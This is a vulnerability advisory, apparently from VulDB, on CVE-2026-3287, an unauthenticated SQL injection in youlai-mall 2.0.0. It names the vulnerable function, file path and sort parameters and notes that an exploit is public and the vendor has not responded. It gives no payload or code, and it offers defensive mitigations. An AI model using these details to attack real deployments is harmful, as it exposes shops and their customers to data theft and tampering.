CVE-2026-3287 in youlai-mall
Summary
by MITRE • 02/27/2026
A security flaw has been discovered in youlaitech youlai-mall 2.0.0. This affects the function listPagedSpuForApp of the file mall-pms/pms-boot/src/main/java/com/youlai/mall/pms/controller/app/SpuController.java of the component App-side Product Pagination Endpoint. Performing a manipulation of the argument sortField/sort results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 03/03/2026
The vulnerability identified as CVE-2026-3287 represents a critical security flaw in the youlai-tech youlai-mall 2.0.0 application, specifically within the App-side Product Pagination Endpoint. This vulnerability resides in the SpuController.java file at mall-pms/pms-boot/src/main/java/com/youlai/mall/pms/controller/app/ which handles product listing operations for mobile applications. The flaw manifests in the listPagedSpuForApp function where user-supplied input parameters related to sorting functionality are improperly handled, creating an avenue for malicious exploitation.
The technical implementation of this vulnerability stems from inadequate input validation and sanitization within the sorting parameter processing mechanism. When the application receives requests containing sortField or sort arguments, it directly incorporates these values into SQL query construction without proper parameterization or input filtering. This design flaw aligns with CWE-89, which specifically addresses SQL injection vulnerabilities arising from improper handling of user input in database queries. The vulnerability operates at the application layer where the sorting parameters are processed, making it particularly dangerous as it can be exploited through standard HTTP requests without requiring authentication or privileged access.
Remote exploitation of this vulnerability presents significant operational risks for organizations utilizing the affected youlai-mall version. Attackers can craft malicious requests that manipulate the sortField and sort parameters to inject arbitrary SQL commands into the backend database queries. This capability allows for unauthorized data access, data modification, or even complete database compromise. The public availability of exploits for this vulnerability increases the threat surface considerably, as malicious actors can immediately leverage this flaw without requiring advanced technical knowledge or extensive reconnaissance. The lack of vendor response to early disclosure attempts compounds the risk, leaving users without official patches or mitigation guidance during an active threat period.
The impact of successful exploitation extends beyond immediate data breaches to encompass potential system compromise and business disruption. Attackers could extract sensitive customer information, manipulate product catalogs, or gain unauthorized access to administrative functions through database manipulation. This vulnerability particularly affects e-commerce environments where product data integrity is paramount, potentially leading to financial losses, reputational damage, and regulatory compliance issues. Organizations should implement immediate mitigations including input validation, parameterized queries, and network-level restrictions to prevent unauthorized access to the vulnerable endpoint. The absence of vendor response underscores the importance of proactive security measures and alternative mitigation strategies for users of vulnerable software components.
This vulnerability demonstrates the critical importance of secure coding practices and proper input validation in web applications. The flaw represents a classic SQL injection vector that could be addressed through implementation of parameterized queries, input sanitization, and proper access controls. Organizations should review their application code for similar patterns and consider adopting automated security testing tools to identify potential injection vulnerabilities. The incident also highlights the need for robust vendor communication and response mechanisms in vulnerability disclosure processes, as timely vendor engagement is crucial for effective remediation and risk mitigation strategies.